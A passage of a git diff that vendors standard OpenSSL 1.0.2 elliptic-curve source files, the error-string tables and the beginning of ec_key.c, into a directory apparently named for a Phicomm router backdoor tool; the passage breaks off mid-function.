+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/ec.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_EC,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_EC,0,reason)
+
+static ERR_STRING_DATA EC_str_functs[] = {
+    {ERR_FUNC(EC_F_BN_TO_FELEM), "BN_TO_FELEM"},
+    {ERR_FUNC(EC_F_COMPUTE_WNAF), "COMPUTE_WNAF"},
+    {ERR_FUNC(EC_F_D2I_ECPARAMETERS), "d2i_ECParameters"},
+    {ERR_FUNC(EC_F_D2I_ECPKPARAMETERS), "d2i_ECPKParameters"},
+    {ERR_FUNC(EC_F_D2I_ECPRIVATEKEY), "d2i_ECPrivateKey"},
+    {ERR_FUNC(EC_F_DO_EC_KEY_PRINT), "DO_EC_KEY_PRINT"},
+    {ERR_FUNC(EC_F_ECDH_CMS_DECRYPT), "ECDH_CMS_DECRYPT"},
+    {ERR_FUNC(EC_F_ECDH_CMS_SET_SHARED_INFO), "ECDH_CMS_SET_SHARED_INFO"},
+    {ERR_FUNC(EC_F_ECKEY_PARAM2TYPE), "ECKEY_PARAM2TYPE"},
+    {ERR_FUNC(EC_F_ECKEY_PARAM_DECODE), "ECKEY_PARAM_DECODE"},
+    {ERR_FUNC(EC_F_ECKEY_PRIV_DECODE), "ECKEY_PRIV_DECODE"},
+    {ERR_FUNC(EC_F_ECKEY_PRIV_ENCODE), "ECKEY_PRIV_ENCODE"},
+    {ERR_FUNC(EC_F_ECKEY_PUB_DECODE), "ECKEY_PUB_DECODE"},
+    {ERR_FUNC(EC_F_ECKEY_PUB_ENCODE), "ECKEY_PUB_ENCODE"},
+    {ERR_FUNC(EC_F_ECKEY_TYPE2PARAM), "ECKEY_TYPE2PARAM"},
+    {ERR_FUNC(EC_F_ECPARAMETERS_PRINT), "ECParameters_print"},
+    {ERR_FUNC(EC_F_ECPARAMETERS_PRINT_FP), "ECParameters_print_fp"},
+    {ERR_FUNC(EC_F_ECPKPARAMETERS_PRINT), "ECPKParameters_print"},
+    {ERR_FUNC(EC_F_ECPKPARAMETERS_PRINT_FP), "ECPKParameters_print_fp"},
+    {ERR_FUNC(EC_F_ECP_NIST_MOD_192), "ECP_NIST_MOD_192"},
+    {ERR_FUNC(EC_F_ECP_NIST_MOD_224), "ECP_NIST_MOD_224"},
+    {ERR_FUNC(EC_F_ECP_NIST_MOD_256), "ECP_NIST_MOD_256"},
+    {ERR_FUNC(EC_F_ECP_NIST_MOD_521), "ECP_NIST_MOD_521"},
+    {ERR_FUNC(EC_F_EC_ASN1_GROUP2CURVE), "EC_ASN1_GROUP2CURVE"},
+    {ERR_FUNC(EC_F_EC_ASN1_GROUP2FIELDID), "EC_ASN1_GROUP2FIELDID"},
+    {ERR_FUNC(EC_F_EC_ASN1_GROUP2PARAMETERS), "EC_ASN1_GROUP2PARAMETERS"},
+    {ERR_FUNC(EC_F_EC_ASN1_GROUP2PKPARAMETERS), "EC_ASN1_GROUP2PKPARAMETERS"},
+    {ERR_FUNC(EC_F_EC_ASN1_PARAMETERS2GROUP), "EC_ASN1_PARAMETERS2GROUP"},
+    {ERR_FUNC(EC_F_EC_ASN1_PKPARAMETERS2GROUP), "EC_ASN1_PKPARAMETERS2GROUP"},
+    {ERR_FUNC(EC_F_EC_EX_DATA_SET_DATA), "EC_EX_DATA_set_data"},
+    {ERR_FUNC(EC_F_EC_GF2M_MONTGOMERY_POINT_MULTIPLY),
+     "EC_GF2M_MONTGOMERY_POINT_MULTIPLY"},
+    {ERR_FUNC(EC_F_EC_GF2M_SIMPLE_GROUP_CHECK_DISCRIMINANT),
+     "ec_GF2m_simple_group_check_discriminant"},
+    {ERR_FUNC(EC_F_EC_GF2M_SIMPLE_GROUP_SET_CURVE),
+     "ec_GF2m_simple_group_set_curve"},
+    {ERR_FUNC(EC_F_EC_GF2M_SIMPLE_OCT2POINT), "ec_GF2m_simple_oct2point"},
+    {ERR_FUNC(EC_F_EC_GF2M_SIMPLE_POINT2OCT), "ec_GF2m_simple_point2oct"},
+    {ERR_FUNC(EC_F_EC_GF2M_SIMPLE_POINT_GET_AFFINE_COORDINATES),
+     "ec_GF2m_simple_point_get_affine_coordinates"},
+    {ERR_FUNC(EC_F_EC_GF2M_SIMPLE_POINT_SET_AFFINE_COORDINATES),
+     "ec_GF2m_simple_point_set_affine_coordinates"},
+    {ERR_FUNC(EC_F_EC_GF2M_SIMPLE_SET_COMPRESSED_COORDINATES),
+     "ec_GF2m_simple_set_compressed_coordinates"},
+    {ERR_FUNC(EC_F_EC_GFP_MONT_FIELD_DECODE), "ec_GFp_mont_field_decode"},
+    {ERR_FUNC(EC_F_EC_GFP_MONT_FIELD_ENCODE), "ec_GFp_mont_field_encode"},
+    {ERR_FUNC(EC_F_EC_GFP_MONT_FIELD_MUL), "ec_GFp_mont_field_mul"},
+    {ERR_FUNC(EC_F_EC_GFP_MONT_FIELD_SET_TO_ONE),
+     "ec_GFp_mont_field_set_to_one"},
+    {ERR_FUNC(EC_F_EC_GFP_MONT_FIELD_SQR), "ec_GFp_mont_field_sqr"},
+    {ERR_FUNC(EC_F_EC_GFP_MONT_GROUP_SET_CURVE),
+     "ec_GFp_mont_group_set_curve"},
+    {ERR_FUNC(EC_F_EC_GFP_MONT_GROUP_SET_CURVE_GFP),
+     "EC_GFP_MONT_GROUP_SET_CURVE_GFP"},
+    {ERR_FUNC(EC_F_EC_GFP_NISTP224_GROUP_SET_CURVE),
+     "ec_GFp_nistp224_group_set_curve"},
+    {ERR_FUNC(EC_F_EC_GFP_NISTP224_POINTS_MUL), "ec_GFp_nistp224_points_mul"},
+    {ERR_FUNC(EC_F_EC_GFP_NISTP224_POINT_GET_AFFINE_COORDINATES),
+     "ec_GFp_nistp224_point_get_affine_coordinates"},
+    {ERR_FUNC(EC_F_EC_GFP_NISTP256_GROUP_SET_CURVE),
+     "ec_GFp_nistp256_group_set_curve"},
+    {ERR_FUNC(EC_F_EC_GFP_NISTP256_POINTS_MUL), "ec_GFp_nistp256_points_mul"},
+    {ERR_FUNC(EC_F_EC_GFP_NISTP256_POINT_GET_AFFINE_COORDINATES),
+     "ec_GFp_nistp256_point_get_affine_coordinates"},
+    {ERR_FUNC(EC_F_EC_GFP_NISTP521_GROUP_SET_CURVE),
+     "ec_GFp_nistp521_group_set_curve"},
+    {ERR_FUNC(EC_F_EC_GFP_NISTP521_POINTS_MUL), "ec_GFp_nistp521_points_mul"},
+    {ERR_FUNC(EC_F_EC_GFP_NISTP521_POINT_GET_AFFINE_COORDINATES),
+     "ec_GFp_nistp521_point_get_affine_coordinates"},
+    {ERR_FUNC(EC_F_EC_GFP_NIST_FIELD_MUL), "ec_GFp_nist_field_mul"},
+    {ERR_FUNC(EC_F_EC_GFP_NIST_FIELD_SQR), "ec_GFp_nist_field_sqr"},
+    {ERR_FUNC(EC_F_EC_GFP_NIST_GROUP_SET_CURVE),
+     "ec_GFp_nist_group_set_curve"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_GROUP_CHECK_DISCRIMINANT),
+     "ec_GFp_simple_group_check_discriminant"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_GROUP_SET_CURVE),
+     "ec_GFp_simple_group_set_curve"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_GROUP_SET_CURVE_GFP),
+     "EC_GFP_SIMPLE_GROUP_SET_CURVE_GFP"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_GROUP_SET_GENERATOR),
+     "EC_GFP_SIMPLE_GROUP_SET_GENERATOR"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_MAKE_AFFINE), "ec_GFp_simple_make_affine"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_OCT2POINT), "ec_GFp_simple_oct2point"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_POINT2OCT), "ec_GFp_simple_point2oct"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_POINTS_MAKE_AFFINE),
+     "ec_GFp_simple_points_make_affine"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES),
+     "ec_GFp_simple_point_get_affine_coordinates"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES_GFP),
+     "EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES_GFP"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES),
+     "ec_GFp_simple_point_set_affine_coordinates"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES_GFP),
+     "EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES_GFP"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES),
+     "ec_GFp_simple_set_compressed_coordinates"},
+    {ERR_FUNC(EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES_GFP),
+     "EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES_GFP"},
+    {ERR_FUNC(EC_F_EC_GROUP_CHECK), "EC_GROUP_check"},
+    {ERR_FUNC(EC_F_EC_GROUP_CHECK_DISCRIMINANT),
+     "EC_GROUP_check_discriminant"},
+    {ERR_FUNC(EC_F_EC_GROUP_COPY), "EC_GROUP_copy"},
+    {ERR_FUNC(EC_F_EC_GROUP_GET0_GENERATOR), "EC_GROUP_get0_generator"},
+    {ERR_FUNC(EC_F_EC_GROUP_GET_COFACTOR), "EC_GROUP_get_cofactor"},
+    {ERR_FUNC(EC_F_EC_GROUP_GET_CURVE_GF2M), "EC_GROUP_get_curve_GF2m"},
+    {ERR_FUNC(EC_F_EC_GROUP_GET_CURVE_GFP), "EC_GROUP_get_curve_GFp"},
+    {ERR_FUNC(EC_F_EC_GROUP_GET_DEGREE), "EC_GROUP_get_degree"},
+    {ERR_FUNC(EC_F_EC_GROUP_GET_ORDER), "EC_GROUP_get_order"},
+    {ERR_FUNC(EC_F_EC_GROUP_GET_PENTANOMIAL_BASIS),
+     "EC_GROUP_get_pentanomial_basis"},
+    {ERR_FUNC(EC_F_EC_GROUP_GET_TRINOMIAL_BASIS),
+     "EC_GROUP_get_trinomial_basis"},
+    {ERR_FUNC(EC_F_EC_GROUP_NEW), "EC_GROUP_new"},
+    {ERR_FUNC(EC_F_EC_GROUP_NEW_BY_CURVE_NAME), "EC_GROUP_new_by_curve_name"},
+    {ERR_FUNC(EC_F_EC_GROUP_NEW_FROM_DATA), "EC_GROUP_NEW_FROM_DATA"},
+    {ERR_FUNC(EC_F_EC_GROUP_PRECOMPUTE_MULT), "EC_GROUP_precompute_mult"},
+    {ERR_FUNC(EC_F_EC_GROUP_SET_CURVE_GF2M), "EC_GROUP_set_curve_GF2m"},
+    {ERR_FUNC(EC_F_EC_GROUP_SET_CURVE_GFP), "EC_GROUP_set_curve_GFp"},
+    {ERR_FUNC(EC_F_EC_GROUP_SET_EXTRA_DATA), "EC_GROUP_SET_EXTRA_DATA"},
+    {ERR_FUNC(EC_F_EC_GROUP_SET_GENERATOR), "EC_GROUP_set_generator"},
+    {ERR_FUNC(EC_F_EC_KEY_CHECK_KEY), "EC_KEY_check_key"},
+    {ERR_FUNC(EC_F_EC_KEY_COPY), "EC_KEY_copy"},
+    {ERR_FUNC(EC_F_EC_KEY_GENERATE_KEY), "EC_KEY_generate_key"},
+    {ERR_FUNC(EC_F_EC_KEY_NEW), "EC_KEY_new"},
+    {ERR_FUNC(EC_F_EC_KEY_PRINT), "EC_KEY_print"},
+    {ERR_FUNC(EC_F_EC_KEY_PRINT_FP), "EC_KEY_print_fp"},
+    {ERR_FUNC(EC_F_EC_KEY_SET_PUBLIC_KEY_AFFINE_COORDINATES),
+     "EC_KEY_set_public_key_affine_coordinates"},
+    {ERR_FUNC(EC_F_EC_POINTS_MAKE_AFFINE), "EC_POINTs_make_affine"},
+    {ERR_FUNC(EC_F_EC_POINT_ADD), "EC_POINT_add"},
+    {ERR_FUNC(EC_F_EC_POINT_CMP), "EC_POINT_cmp"},
+    {ERR_FUNC(EC_F_EC_POINT_COPY), "EC_POINT_copy"},
+    {ERR_FUNC(EC_F_EC_POINT_DBL), "EC_POINT_dbl"},
+    {ERR_FUNC(EC_F_EC_POINT_GET_AFFINE_COORDINATES_GF2M),
+     "EC_POINT_get_affine_coordinates_GF2m"},
+    {ERR_FUNC(EC_F_EC_POINT_GET_AFFINE_COORDINATES_GFP),
+     "EC_POINT_get_affine_coordinates_GFp"},
+    {ERR_FUNC(EC_F_EC_POINT_GET_JPROJECTIVE_COORDINATES_GFP),
+     "EC_POINT_get_Jprojective_coordinates_GFp"},
+    {ERR_FUNC(EC_F_EC_POINT_INVERT), "EC_POINT_invert"},
+    {ERR_FUNC(EC_F_EC_POINT_IS_AT_INFINITY), "EC_POINT_is_at_infinity"},
+    {ERR_FUNC(EC_F_EC_POINT_IS_ON_CURVE), "EC_POINT_is_on_curve"},
+    {ERR_FUNC(EC_F_EC_POINT_MAKE_AFFINE), "EC_POINT_make_affine"},
+    {ERR_FUNC(EC_F_EC_POINT_MUL), "EC_POINT_mul"},
+    {ERR_FUNC(EC_F_EC_POINT_NEW), "EC_POINT_new"},
+    {ERR_FUNC(EC_F_EC_POINT_OCT2POINT), "EC_POINT_oct2point"},
+    {ERR_FUNC(EC_F_EC_POINT_POINT2OCT), "EC_POINT_point2oct"},
+    {ERR_FUNC(EC_F_EC_POINT_SET_AFFINE_COORDINATES_GF2M),
+     "EC_POINT_set_affine_coordinates_GF2m"},
+    {ERR_FUNC(EC_F_EC_POINT_SET_AFFINE_COORDINATES_GFP),
+     "EC_POINT_set_affine_coordinates_GFp"},
+    {ERR_FUNC(EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GF2M),
+     "EC_POINT_set_compressed_coordinates_GF2m"},
+    {ERR_FUNC(EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GFP),
+     "EC_POINT_set_compressed_coordinates_GFp"},
+    {ERR_FUNC(EC_F_EC_POINT_SET_JPROJECTIVE_COORDINATES_GFP),
+     "EC_POINT_set_Jprojective_coordinates_GFp"},
+    {ERR_FUNC(EC_F_EC_POINT_SET_TO_INFINITY), "EC_POINT_set_to_infinity"},
+    {ERR_FUNC(EC_F_EC_PRE_COMP_DUP), "EC_PRE_COMP_DUP"},
+    {ERR_FUNC(EC_F_EC_PRE_COMP_NEW), "EC_PRE_COMP_NEW"},
+    {ERR_FUNC(EC_F_EC_WNAF_MUL), "ec_wNAF_mul"},
+    {ERR_FUNC(EC_F_EC_WNAF_PRECOMPUTE_MULT), "ec_wNAF_precompute_mult"},
+    {ERR_FUNC(EC_F_I2D_ECPARAMETERS), "i2d_ECParameters"},
+    {ERR_FUNC(EC_F_I2D_ECPKPARAMETERS), "i2d_ECPKParameters"},
+    {ERR_FUNC(EC_F_I2D_ECPRIVATEKEY), "i2d_ECPrivateKey"},
+    {ERR_FUNC(EC_F_I2O_ECPUBLICKEY), "i2o_ECPublicKey"},
+    {ERR_FUNC(EC_F_NISTP224_PRE_COMP_NEW), "NISTP224_PRE_COMP_NEW"},
+    {ERR_FUNC(EC_F_NISTP256_PRE_COMP_NEW), "NISTP256_PRE_COMP_NEW"},
+    {ERR_FUNC(EC_F_NISTP521_PRE_COMP_NEW), "NISTP521_PRE_COMP_NEW"},
+    {ERR_FUNC(EC_F_ECP_NISTZ256_GET_AFFINE), "ecp_nistz256_get_affine"},
+    {ERR_FUNC(EC_F_ECP_NISTZ256_POINTS_MUL), "ecp_nistz256_points_mul"},
+    {ERR_FUNC(EC_F_ECP_NISTZ256_WINDOWED_MUL), "ecp_nistz256_windowed_mul"},
+    {ERR_FUNC(EC_F_ECP_NISTZ256_MULT_PRECOMPUTE),
+     "ecp_nistz256_mult_precompute"},
+    {ERR_FUNC(EC_F_ECP_NISTZ256_PRE_COMP_NEW), "ecp_nistz256_pre_comp_new"},
+    {ERR_FUNC(EC_F_O2I_ECPUBLICKEY), "o2i_ECPublicKey"},
+    {ERR_FUNC(EC_F_OLD_EC_PRIV_DECODE), "OLD_EC_PRIV_DECODE"},
+    {ERR_FUNC(EC_F_PKEY_EC_CTRL), "PKEY_EC_CTRL"},
+    {ERR_FUNC(EC_F_PKEY_EC_CTRL_STR), "PKEY_EC_CTRL_STR"},
+    {ERR_FUNC(EC_F_PKEY_EC_DERIVE), "PKEY_EC_DERIVE"},
+    {ERR_FUNC(EC_F_PKEY_EC_KEYGEN), "PKEY_EC_KEYGEN"},
+    {ERR_FUNC(EC_F_PKEY_EC_PARAMGEN), "PKEY_EC_PARAMGEN"},
+    {ERR_FUNC(EC_F_PKEY_EC_SIGN), "PKEY_EC_SIGN"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA EC_str_reasons[] = {
+    {ERR_REASON(EC_R_ASN1_ERROR), "asn1 error"},
+    {ERR_REASON(EC_R_ASN1_UNKNOWN_FIELD), "asn1 unknown field"},
+    {ERR_REASON(EC_R_BIGNUM_OUT_OF_RANGE), "bignum out of range"},
+    {ERR_REASON(EC_R_BUFFER_TOO_SMALL), "buffer too small"},
+    {ERR_REASON(EC_R_COORDINATES_OUT_OF_RANGE), "coordinates out of range"},
+    {ERR_REASON(EC_R_D2I_ECPKPARAMETERS_FAILURE),
+     "d2i ecpkparameters failure"},
+    {ERR_REASON(EC_R_DECODE_ERROR), "decode error"},
+    {ERR_REASON(EC_R_DISCRIMINANT_IS_ZERO), "discriminant is zero"},
+    {ERR_REASON(EC_R_EC_GROUP_NEW_BY_NAME_FAILURE),
+     "ec group new by name failure"},
+    {ERR_REASON(EC_R_FIELD_TOO_LARGE), "field too large"},
+    {ERR_REASON(EC_R_GF2M_NOT_SUPPORTED), "gf2m not supported"},
+    {ERR_REASON(EC_R_GROUP2PKPARAMETERS_FAILURE),
+     "group2pkparameters failure"},
+    {ERR_REASON(EC_R_I2D_ECPKPARAMETERS_FAILURE),
+     "i2d ecpkparameters failure"},
+    {ERR_REASON(EC_R_INCOMPATIBLE_OBJECTS), "incompatible objects"},
+    {ERR_REASON(EC_R_INVALID_ARGUMENT), "invalid argument"},
+    {ERR_REASON(EC_R_INVALID_COMPRESSED_POINT), "invalid compressed point"},
+    {ERR_REASON(EC_R_INVALID_COMPRESSION_BIT), "invalid compression bit"},
+    {ERR_REASON(EC_R_INVALID_CURVE), "invalid curve"},
+    {ERR_REASON(EC_R_INVALID_DIGEST), "invalid digest"},
+    {ERR_REASON(EC_R_INVALID_DIGEST_TYPE), "invalid digest type"},
+    {ERR_REASON(EC_R_INVALID_ENCODING), "invalid encoding"},
+    {ERR_REASON(EC_R_INVALID_FIELD), "invalid field"},
+    {ERR_REASON(EC_R_INVALID_FORM), "invalid form"},
+    {ERR_REASON(EC_R_INVALID_GROUP_ORDER), "invalid group order"},
+    {ERR_REASON(EC_R_INVALID_PENTANOMIAL_BASIS), "invalid pentanomial basis"},
+    {ERR_REASON(EC_R_INVALID_PRIVATE_KEY), "invalid private key"},
+    {ERR_REASON(EC_R_INVALID_TRINOMIAL_BASIS), "invalid trinomial basis"},
+    {ERR_REASON(EC_R_KDF_PARAMETER_ERROR), "kdf parameter error"},
+    {ERR_REASON(EC_R_KEYS_NOT_SET), "keys not set"},
+    {ERR_REASON(EC_R_MISSING_PARAMETERS), "missing parameters"},
+    {ERR_REASON(EC_R_MISSING_PRIVATE_KEY), "missing private key"},
+    {ERR_REASON(EC_R_NOT_A_NIST_PRIME), "not a NIST prime"},
+    {ERR_REASON(EC_R_NOT_A_SUPPORTED_NIST_PRIME),
+     "not a supported NIST prime"},
+    {ERR_REASON(EC_R_NOT_IMPLEMENTED), "not implemented"},
+    {ERR_REASON(EC_R_NOT_INITIALIZED), "not initialized"},
+    {ERR_REASON(EC_R_NO_FIELD_MOD), "no field mod"},
+    {ERR_REASON(EC_R_NO_PARAMETERS_SET), "no parameters set"},
+    {ERR_REASON(EC_R_PASSED_NULL_PARAMETER), "passed null parameter"},
+    {ERR_REASON(EC_R_PEER_KEY_ERROR), "peer key error"},
+    {ERR_REASON(EC_R_PKPARAMETERS2GROUP_FAILURE),
+     "pkparameters2group failure"},
+    {ERR_REASON(EC_R_POINT_AT_INFINITY), "point at infinity"},
+    {ERR_REASON(EC_R_POINT_IS_NOT_ON_CURVE), "point is not on curve"},
+    {ERR_REASON(EC_R_SHARED_INFO_ERROR), "shared info error"},
+    {ERR_REASON(EC_R_SLOT_FULL), "slot full"},
+    {ERR_REASON(EC_R_UNDEFINED_GENERATOR), "undefined generator"},
+    {ERR_REASON(EC_R_UNDEFINED_ORDER), "undefined order"},
+    {ERR_REASON(EC_R_UNKNOWN_GROUP), "unknown group"},
+    {ERR_REASON(EC_R_UNKNOWN_ORDER), "unknown order"},
+    {ERR_REASON(EC_R_UNSUPPORTED_FIELD), "unsupported field"},
+    {ERR_REASON(EC_R_WRONG_CURVE_PARAMETERS), "wrong curve parameters"},
+    {ERR_REASON(EC_R_WRONG_ORDER), "wrong order"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_EC_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(EC_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, EC_str_functs);
+        ERR_load_strings(0, EC_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_key.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_key.c
new file mode 100644
index 0000000..ebdffc8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_key.c
@@ -0,0 +1,559 @@
+/* crypto/ec/ec_key.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * Portions originally developed by SUN MICROSYSTEMS, INC., and
+ * contributed to the OpenSSL project.
+ */
+
+#include <string.h>
+#include "ec_lcl.h"
+#include <openssl/err.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+EC_KEY *EC_KEY_new(void)
+{
+    EC_KEY *ret;
+
+    ret = (EC_KEY *)OPENSSL_malloc(sizeof(EC_KEY));
+    if (ret == NULL) {
+        ECerr(EC_F_EC_KEY_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+
+    ret->version = 1;
+    ret->flags = 0;
+    ret->group = NULL;
+    ret->pub_key = NULL;
+    ret->priv_key = NULL;
+    ret->enc_flag = 0;
+    ret->conv_form = POINT_CONVERSION_UNCOMPRESSED;
+    ret->references = 1;
+    ret->method_data = NULL;
+    return (ret);
+}
+
+EC_KEY *EC_KEY_new_by_curve_name(int nid)
+{
+    EC_KEY *ret = EC_KEY_new();
+    if (ret == NULL)
+        return NULL;
+    ret->group = EC_GROUP_new_by_curve_name(nid);
+    if (ret->group == NULL) {
+        EC_KEY_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void EC_KEY_free(EC_KEY *r)
+{
+    int i;
+
+    if (r == NULL)
+        return;
+
+    i = CRYPTO_add(&r->references, -1, CRYPTO_LOCK_EC);
+#ifdef REF_PRINT
+    REF_PRINT("EC_KEY", r);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "EC_KEY_free, bad reference count\n");
+        abort();
+    }
+#endif
+
+    if (r->group != NULL)
+        EC_GROUP_free(r->group);
+    if (r->pub_key != NULL)
+        EC_POINT_free(r->pub_key);
+    if (r->priv_key != NULL)
+        BN_clear_free(r->priv_key);
+
+    EC_EX_DATA_free_all_data(&r->method_data);
+
+    OPENSSL_cleanse((void *)r, sizeof(EC_KEY));
+
+    OPENSSL_free(r);
+}
+
+EC_KEY *EC_KEY_copy(EC_KEY *dest, const EC_KEY *src)
+{
+    EC_EXTRA_DATA *d;
+
+    if (dest == NULL || src == NULL) {
+        ECerr(EC_F_EC_KEY_COPY, ERR_R_PASSED_NULL_PARAMETER);
+        return NULL;
+    }
+    /* copy the parameters */
+    if (src->group) {
+        const EC_METHOD *meth = EC_GROUP_method_of(src->group);
+        /* clear the old group */
+        if (dest->group)
+            EC_GROUP_free(dest->group);
+        dest->group = EC_GROUP_new(meth);
+        if (dest->group == NULL)
+            return NULL;
+        if (!EC_GROUP_copy(dest->group, src->group))
+            return NULL;
+    }
+    /*  copy the public key */
+    if (src->pub_key && src->group) {
+        if (dest->pub_key)
+            EC_POINT_free(dest->pub_key);
+        dest->pub_key = EC_POINT_new(src->group);
+        if (dest->pub_key == NULL)
+            return NULL;
+        if (!EC_POINT_copy(dest->pub_key, src->pub_key))
+            return NULL;
+    }
+    /* copy the private key */
+    if (src->priv_key) {
+        if (dest->priv_key == NULL) {
+            dest->priv_key = BN_new();
+            if (dest->priv_key == NULL)
+                return NULL;
+        }
+        if (!BN_copy(dest->priv_key, src->priv_key))
+            return NULL;
+    }
+    /* copy method/extra data */
+    EC_EX_DATA_free_all_data(&dest->method_data);
+
+    for (d = src->method_data; d != NULL; d = d->next) {
+        void *t = d->dup_func(d->data);
+
+        if (t == NULL)
+            return 0;
+        if (!EC_EX_DATA_set_data
+            (&dest->method_data, t, d->dup_func, d->free_func,
+             d->clear_free_func))
+            return 0;
+    }
+
+    /* copy the rest */
+    dest->enc_flag = src->enc_flag;
+    dest->conv_form = src->conv_form;
+    dest->version = src->version;
+    dest->flags = src->flags;
+
+    return dest;
+}
+
+EC_KEY *EC_KEY_dup(const EC_KEY *ec_key)
+{
+    EC_KEY *ret = EC_KEY_new();
+    if (ret == NULL)
+        return NULL;
+    if (EC_KEY_copy(ret, ec_key) == NULL) {
+        EC_KEY_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+int EC_KEY_up_ref(EC_KEY *r)
+{
+    int i = CRYPTO_add(&r->references, 1, CRYPTO_LOCK_EC);
+#ifdef REF_PRINT
+    REF_PRINT("EC_KEY", r);
+#endif
+#ifdef REF_CHECK
+    if (i < 2) {
+        fprintf(stderr, "EC_KEY_up, bad reference count\n");
+        abort();
+    }
+#endif
+    return ((i > 1) ? 1 : 0);
+}
+
+int EC_KEY_generate_key(EC_KEY *eckey)
+{
+    int ok = 0;
+    BN_CTX *ctx = NULL;
+    BIGNUM *priv_key = NULL, *order = NULL;
+    EC_POINT *pub_key = NULL;
+
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return FIPS_ec_key_generate_key(eckey);
+#endif
+
+    if (!eckey || !eckey->group) {
+        ECerr(EC_F_EC_KEY_GENERATE_KEY, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+
+    if ((order = BN_new()) == NULL)
+        goto err;
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+
+    if (eckey->priv_key == NULL) {
+        priv_key = BN_new();
+        if (priv_key == NULL)
+            goto err;
+    } else
+        priv_key = eckey->priv_key;
+
+    if (!EC_GROUP_get_order(eckey->group, order, ctx))
+        goto err;
+
+    do
